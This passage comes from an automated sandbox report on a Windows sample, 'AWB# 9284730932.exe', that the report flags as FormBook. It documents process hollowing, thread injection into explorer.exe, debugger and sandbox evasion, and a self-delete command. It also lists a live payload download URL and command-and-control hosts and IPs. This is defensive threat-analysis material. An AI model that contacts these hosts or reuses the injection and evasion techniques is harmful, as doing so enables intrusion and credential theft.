      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030DAE73 mov eax, dword ptr fs:[00000030h]14_2_030DAE73
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030DAE73 mov eax, dword ptr fs:[00000030h]14_2_030DAE73
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0314FE87 mov eax, dword ptr fs:[00000030h]14_2_0314FE87
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030ED294 mov eax, dword ptr fs:[00000030h]14_2_030ED294
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030ED294 mov eax, dword ptr fs:[00000030h]14_2_030ED294
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030B52A5 mov eax, dword ptr fs:[00000030h]14_2_030B52A5
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030B52A5 mov eax, dword ptr fs:[00000030h]14_2_030B52A5
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030B52A5 mov eax, dword ptr fs:[00000030h]14_2_030B52A5
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030B52A5 mov eax, dword ptr fs:[00000030h]14_2_030B52A5
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030B52A5 mov eax, dword ptr fs:[00000030h]14_2_030B52A5
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031346A7 mov eax, dword ptr fs:[00000030h]14_2_031346A7
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03180EA5 mov eax, dword ptr fs:[00000030h]14_2_03180EA5
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03180EA5 mov eax, dword ptr fs:[00000030h]14_2_03180EA5
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03180EA5 mov eax, dword ptr fs:[00000030h]14_2_03180EA5
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030EFAB0 mov eax, dword ptr fs:[00000030h]14_2_030EFAB0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030E36CC mov eax, dword ptr fs:[00000030h]14_2_030E36CC
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030F8EC7 mov eax, dword ptr fs:[00000030h]14_2_030F8EC7
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03188ED6 mov eax, dword ptr fs:[00000030h]14_2_03188ED6
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0316FEC0 mov eax, dword ptr fs:[00000030h]14_2_0316FEC0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030E16E0 mov ecx, dword ptr fs:[00000030h]14_2_030E16E0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030C76E2 mov eax, dword ptr fs:[00000030h]14_2_030C76E2
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030B9100 mov eax, dword ptr fs:[00000030h]14_2_030B9100
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030B9100 mov eax, dword ptr fs:[00000030h]14_2_030B9100
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030B9100 mov eax, dword ptr fs:[00000030h]14_2_030B9100
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03188D34 mov eax, dword ptr fs:[00000030h]14_2_03188D34
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030D4120 mov eax, dword ptr fs:[00000030h]14_2_030D4120
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030D4120 mov eax, dword ptr fs:[00000030h]14_2_030D4120
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030D4120 mov eax, dword ptr fs:[00000030h]14_2_030D4120
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030D4120 mov eax, dword ptr fs:[00000030h]14_2_030D4120
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030D4120 mov ecx, dword ptr fs:[00000030h]14_2_030D4120
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030E513A mov eax, dword ptr fs:[00000030h]14_2_030E513A
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030E513A mov eax, dword ptr fs:[00000030h]14_2_030E513A
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030E4D3B mov eax, dword ptr fs:[00000030h]14_2_030E4D3B
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030E4D3B mov eax, dword ptr fs:[00000030h]14_2_030E4D3B
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030E4D3B mov eax, dword ptr fs:[00000030h]14_2_030E4D3B
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030C3D34 mov eax, dword ptr fs:[00000030h]14_2_030C3D34
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030C3D34 mov eax, dword ptr fs:[00000030h]14_2_030C3D34
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030C3D34 mov eax, dword ptr fs:[00000030h]14_2_030C3D34
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030C3D34 mov eax, dword ptr fs:[00000030h]14_2_030C3D34
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030C3D34 mov eax, dword ptr fs:[00000030h]14_2_030C3D34
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030C3D34 mov eax, dword ptr fs:[00000030h]14_2_030C3D34
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030C3D34 mov eax, dword ptr fs:[00000030h]14_2_030C3D34
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030C3D34 mov eax, dword ptr fs:[00000030h]14_2_030C3D34
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030C3D34 mov eax, dword ptr fs:[00000030h]14_2_030C3D34
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030C3D34 mov eax, dword ptr fs:[00000030h]14_2_030C3D34
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030C3D34 mov eax, dword ptr fs:[00000030h]14_2_030C3D34
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030C3D34 mov eax, dword ptr fs:[00000030h]14_2_030C3D34
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030C3D34 mov eax, dword ptr fs:[00000030h]14_2_030C3D34
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030BAD30 mov eax, dword ptr fs:[00000030h]14_2_030BAD30
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030DB944 mov eax, dword ptr fs:[00000030h]14_2_030DB944
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030DB944 mov eax, dword ptr fs:[00000030h]14_2_030DB944
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030F3D43 mov eax, dword ptr fs:[00000030h]14_2_030F3D43
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03133540 mov eax, dword ptr fs:[00000030h]14_2_03133540
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030D7D50 mov eax, dword ptr fs:[00000030h]14_2_030D7D50
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030BB171 mov eax, dword ptr fs:[00000030h]14_2_030BB171
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030BB171 mov eax, dword ptr fs:[00000030h]14_2_030BB171
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030DC577 mov eax, dword ptr fs:[00000030h]14_2_030DC577
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030DC577 mov eax, dword ptr fs:[00000030h]14_2_030DC577
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030B2D8A mov eax, dword ptr fs:[00000030h]14_2_030B2D8A
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030B2D8A mov eax, dword ptr fs:[00000030h]14_2_030B2D8A
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030B2D8A mov eax, dword ptr fs:[00000030h]14_2_030B2D8A
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030B2D8A mov eax, dword ptr fs:[00000030h]14_2_030B2D8A
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030B2D8A mov eax, dword ptr fs:[00000030h]14_2_030B2D8A
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030EA185 mov eax, dword ptr fs:[00000030h]14_2_030EA185
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030DC182 mov eax, dword ptr fs:[00000030h]14_2_030DC182
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030EFD9B mov eax, dword ptr fs:[00000030h]14_2_030EFD9B
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030EFD9B mov eax, dword ptr fs:[00000030h]14_2_030EFD9B
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030E35A1 mov eax, dword ptr fs:[00000030h]14_2_030E35A1
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03168DF1 mov eax, dword ptr fs:[00000030h]14_2_03168DF1
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030BB1E1 mov eax, dword ptr fs:[00000030h]14_2_030BB1E1
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030BB1E1 mov eax, dword ptr fs:[00000030h]14_2_030BB1E1
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030BB1E1 mov eax, dword ptr fs:[00000030h]14_2_030BB1E1
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03137016 mov eax, dword ptr fs:[00000030h]14_2_03137016
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03137016 mov eax, dword ptr fs:[00000030h]14_2_03137016
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03137016 mov eax, dword ptr fs:[00000030h]14_2_03137016
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03184015 mov eax, dword ptr fs:[00000030h]14_2_03184015
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03184015 mov eax, dword ptr fs:[00000030h]14_2_03184015
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03171C06 mov eax, dword ptr fs:[00000030h]14_2_03171C06
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03171C06 mov eax, dword ptr fs:[00000030h]14_2_03171C06
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03171C06 mov eax, dword ptr fs:[00000030h]14_2_03171C06
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03171C06 mov eax, dword ptr fs:[00000030h]14_2_03171C06
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03171C06 mov eax, dword ptr fs:[00000030h]14_2_03171C06
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03171C06 mov eax, dword ptr fs:[00000030h]14_2_03171C06
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03171C06 mov eax, dword ptr fs:[00000030h]14_2_03171C06
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03171C06 mov eax, dword ptr fs:[00000030h]14_2_03171C06
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03171C06 mov eax, dword ptr fs:[00000030h]14_2_03171C06
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03171C06 mov eax, dword ptr fs:[00000030h]14_2_03171C06
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03171C06 mov eax, dword ptr fs:[00000030h]14_2_03171C06
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03171C06 mov eax, dword ptr fs:[00000030h]14_2_03171C06
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03171C06 mov eax, dword ptr fs:[00000030h]14_2_03171C06
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03171C06 mov eax, dword ptr fs:[00000030h]14_2_03171C06
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0318740D mov eax, dword ptr fs:[00000030h]14_2_0318740D
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0318740D mov eax, dword ptr fs:[00000030h]14_2_0318740D
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0318740D mov eax, dword ptr fs:[00000030h]14_2_0318740D
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03136C0A mov eax, dword ptr fs:[00000030h]14_2_03136C0A
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03136C0A mov eax, dword ptr fs:[00000030h]14_2_03136C0A
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03136C0A mov eax, dword ptr fs:[00000030h]14_2_03136C0A
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03136C0A mov eax, dword ptr fs:[00000030h]14_2_03136C0A
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030EBC2C mov eax, dword ptr fs:[00000030h]14_2_030EBC2C
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030CB02A mov eax, dword ptr fs:[00000030h]14_2_030CB02A
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030CB02A mov eax, dword ptr fs:[00000030h]14_2_030CB02A
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030CB02A mov eax, dword ptr fs:[00000030h]14_2_030CB02A
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030CB02A mov eax, dword ptr fs:[00000030h]14_2_030CB02A
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0314C450 mov eax, dword ptr fs:[00000030h]14_2_0314C450
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0314C450 mov eax, dword ptr fs:[00000030h]14_2_0314C450
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030D0050 mov eax, dword ptr fs:[00000030h]14_2_030D0050
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030D0050 mov eax, dword ptr fs:[00000030h]14_2_030D0050
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030D746D mov eax, dword ptr fs:[00000030h]14_2_030D746D
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03172073 mov eax, dword ptr fs:[00000030h]14_2_03172073
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03181074 mov eax, dword ptr fs:[00000030h]14_2_03181074
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030B9080 mov eax, dword ptr fs:[00000030h]14_2_030B9080
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03133884 mov eax, dword ptr fs:[00000030h]14_2_03133884
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03133884 mov eax, dword ptr fs:[00000030h]14_2_03133884
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030F90AF mov eax, dword ptr fs:[00000030h]14_2_030F90AF
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030EF0BF mov ecx, dword ptr fs:[00000030h]14_2_030EF0BF
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030EF0BF mov eax, dword ptr fs:[00000030h]14_2_030EF0BF
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030EF0BF mov eax, dword ptr fs:[00000030h]14_2_030EF0BF
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0314B8D0 mov eax, dword ptr fs:[00000030h]14_2_0314B8D0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0314B8D0 mov ecx, dword ptr fs:[00000030h]14_2_0314B8D0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0314B8D0 mov eax, dword ptr fs:[00000030h]14_2_0314B8D0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0314B8D0 mov eax, dword ptr fs:[00000030h]14_2_0314B8D0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0314B8D0 mov eax, dword ptr fs:[00000030h]14_2_0314B8D0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0314B8D0 mov eax, dword ptr fs:[00000030h]14_2_0314B8D0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03188CD6 mov eax, dword ptr fs:[00000030h]14_2_03188CD6
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03136CF0 mov eax, dword ptr fs:[00000030h]14_2_03136CF0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03136CF0 mov eax, dword ptr fs:[00000030h]14_2_03136CF0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03136CF0 mov eax, dword ptr fs:[00000030h]14_2_03136CF0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031714FB mov eax, dword ptr fs:[00000030h]14_2_031714FB
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0015AC30 GetProcessHeap,RtlFreeHeap,GetProcessHeap,RtlFreeHeap,14_2_0015AC30
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_00563198 RtlAddVectoredExceptionHandler,NtProtectVirtualMemory,LdrInitializeThunk,NtProtectVirtualMemory,11_2_00563198
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_00167310 SetUnhandledExceptionFilter,14_2_00167310
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_00166FE3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_00166FE3

      HIPS / PFW / Operating System Protection Evasion:

      barindex
      System process connects to network (likely due to code injection or exploit)Show sources
      Source: C:\Windows\explorer.exeNetwork Connect: 103.53.126.132 80Jump to behavior
      Maps a DLL or memory area into another processShow sources
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and writeJump to behavior
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
      Modifies the context of a thread in another process (thread injection)Show sources
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeThread register set: target process: 3472Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeThread register set: target process: 3472Jump to behavior
      Queues an APC in another process (thread injection)Show sources
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
      Sample uses process hollowing techniqueShow sources
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeSection unmapped: C:\Windows\SysWOW64\cmd.exe base address: 150000Jump to behavior
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeProcess created: C:\Users\user\Desktop\AWB# 9284730932.exe 'C:\Users\user\Desktop\AWB# 9284730932.exe' Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\AWB# 9284730932.exe'Jump to behavior
      Source: explorer.exe, 0000000D.00000002.515396011.0000000005EA0000.00000004.00000001.sdmp, cmd.exe, 0000000E.00000002.503256494.0000000004210000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
      Source: explorer.exe, 0000000D.00000002.502206843.0000000001640000.00000002.00000001.sdmp, cmd.exe, 0000000E.00000002.503256494.0000000004210000.00000002.00000001.sdmpBinary or memory string: Progman
      Source: explorer.exe, 0000000D.00000002.502206843.0000000001640000.00000002.00000001.sdmp, cmd.exe, 0000000E.00000002.503256494.0000000004210000.00000002.00000001.sdmpBinary or memory string: SProgram Managerl
      Source: explorer.exe, 0000000D.00000000.333135184.0000000001128000.00000004.00000020.sdmpBinary or memory string: ProgmanOMEa
      Source: explorer.exe, 0000000D.00000002.502206843.0000000001640000.00000002.00000001.sdmp, cmd.exe, 0000000E.00000002.503256494.0000000004210000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
      Source: explorer.exe, 0000000D.00000002.502206843.0000000001640000.00000002.00000001.sdmp, cmd.exe, 0000000E.00000002.503256494.0000000004210000.00000002.00000001.sdmpBinary or memory string: Progmanlock
      Source: C:\Windows\SysWOW64\cmd.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,14_2_001596A0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc,14_2_00155AEF
      Source: C:\Windows\SysWOW64\cmd.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,14_2_00163F80
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_00173C49 GetSystemTime,SystemTimeToFileTime,14_2_00173C49
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0015443C GetVersion,14_2_0015443C

      Stealing of Sensitive Information:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 0000000B.00000002.373125113.000000001E150000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.373146227.000000001E180000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000E.00000002.501858309.0000000002F20000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000E.00000002.501396069.0000000000520000.00000004.00000001.sdmp, type: MEMORY
      Yara detected Generic DropperShow sources
      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 6656, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: AWB# 9284730932.exe PID: 6252, type: MEMORY

      Remote Access Functionality:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 0000000B.00000002.373125113.000000001E150000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.373146227.000000001E180000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000E.00000002.501858309.0000000002F20000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000E.00000002.501396069.0000000000520000.00000004.00000001.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid Accounts1Shared Modules1Valid Accounts1Valid Accounts1Rootkit1Credential API Hooking1System Time Discovery1Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsAccess Token Manipulation1Valid Accounts1Input Capture1Security Software Discovery641Remote Desktop ProtocolInput Capture1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Process Injection512Access Token Manipulation1Security Account ManagerVirtualization/Sandbox Evasion22SMB/Windows Admin SharesArchive Collected Data1Automated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion22NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol2SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection512LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsFile and Directory Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information2DCSyncSystem Information Discovery214Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 320390 Sample: AWB# 9284730932.exe Startdate: 19/11/2020 Architecture: WINDOWS Score: 100 29 www.algulmotors.com 2->29 31 algulmotors.com 2->31 37 Potential malicious icon found 2->37 39 Malicious sample detected (through community Yara rule) 2->39 41 Antivirus detection for URL or domain 2->41 43 10 other signatures 2->43 11 AWB# 9284730932.exe 2->11         started        signatures3 process4 signatures5 53 Tries to detect Any.run 11->53 55 Hides threads from debuggers 11->55 14 AWB# 9284730932.exe 6 11->14         started        process6 dnsIp7 35 lifeandhealth.com.mx 192.185.170.106, 443, 49720 UNIFIEDLAYER-AS-1US United States 14->35 57 Modifies the context of a thread in another process (thread injection) 14->57 59 Tries to detect Any.run 14->59 61 Maps a DLL or memory area into another process 14->61 63 3 other signatures 14->63 18 explorer.exe 14->18 injected signatures8 process9 dnsIp10 33 www.baizhan180.xyz 103.53.126.132, 80 CHINATELECOM-JIANGSU-YANGZHOU-IDCCHINATELECOMJiangSuYangZ China 18->33 45 System process connects to network (likely due to code injection or exploit) 18->45 22 cmd.exe 18->22         started        signatures11 process12 signatures13 47 Modifies the context of a thread in another process (thread injection) 22->47 49 Maps a DLL or memory area into another process 22->49 51 Tries to detect virtualization through RDTSC time measurements 22->51 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      AWB# 9284730932.exe28%VirustotalBrowse
      AWB# 9284730932.exe23%ReversingLabsWin32.Trojan.Generic

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      SourceDetectionScannerLabelLink
      lifeandhealth.com.mx0%VirustotalBrowse

      URLs

      SourceDetectionScannerLabelLink
      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
      http://www.tiro.com0%URL Reputationsafe
      http://www.tiro.com0%URL Reputationsafe
      http://www.tiro.com0%URL Reputationsafe
      https://lifeandhealth.com.mx/graceofgod/floow_tAAkniYUly238.bin100%Avira URL Cloudmalware
      http://www.goodfont.co.kr0%URL Reputationsafe
      http://www.goodfont.co.kr0%URL Reputationsafe
      http://www.goodfont.co.kr0%URL Reputationsafe
      http://www.carterandcone.coml0%URL Reputationsafe
      http://www.carterandcone.coml0%URL Reputationsafe
      http://www.carterandcone.coml0%URL Reputationsafe
      http://www.sajatypeworks.com0%URL Reputationsafe
      http://www.sajatypeworks.com0%URL Reputationsafe
      http://www.sajatypeworks.com0%URL Reputationsafe
      http://www.typography.netD0%URL Reputationsafe
      http://www.typography.netD0%URL Reputationsafe
      http://www.typography.netD0%URL Reputationsafe
      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
      http://fontfabrik.com0%URL Reputationsafe
      http://fontfabrik.com0%URL Reputationsafe
      http://fontfabrik.com0%URL Reputationsafe
      http://www.founder.com.cn/cn0%URL Reputationsafe
      http://www.founder.com.cn/cn0%URL Reputationsafe
      http://www.founder.com.cn/cn0%URL Reputationsafe
      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
      http://www.sandoll.co.kr0%URL Reputationsafe
      http://www.sandoll.co.kr0%URL Reputationsafe
      http://www.sandoll.co.kr0%URL Reputationsafe
